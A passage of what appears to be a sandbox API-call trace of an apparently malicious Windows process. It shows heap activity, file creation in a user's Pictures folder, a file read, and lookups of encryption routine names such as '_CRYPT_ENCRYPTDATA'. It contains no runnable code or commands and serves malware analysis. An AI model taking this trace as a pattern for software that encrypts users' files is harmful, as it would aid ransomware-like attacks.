(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.599] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0189.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0189.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\p8p2fux.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0189.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0189.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0189.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0189.603] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.603] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa5d9, lpOverlapped=0x0) returned 1 [0189.605] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa5d9) returned 0xbea018 [0189.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0189.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa5d9) returned 0xbf4600 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa5d9) returned 0xbea018 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0189.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0189.608] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.608] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa5d9) returned 0xbea018 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa5d9) returned 0xbfebe8 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0189.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0189.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0189.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0189.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.610] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0189.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.611] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0189.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.612] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa 